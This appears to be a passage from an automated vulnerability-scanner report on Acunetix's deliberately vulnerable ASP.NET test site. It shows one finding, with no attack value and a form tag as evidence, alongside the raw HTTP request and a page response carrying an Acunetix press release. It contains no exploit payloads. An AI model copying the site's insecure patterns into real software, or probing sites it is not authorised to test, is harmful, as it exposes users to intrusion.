jwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd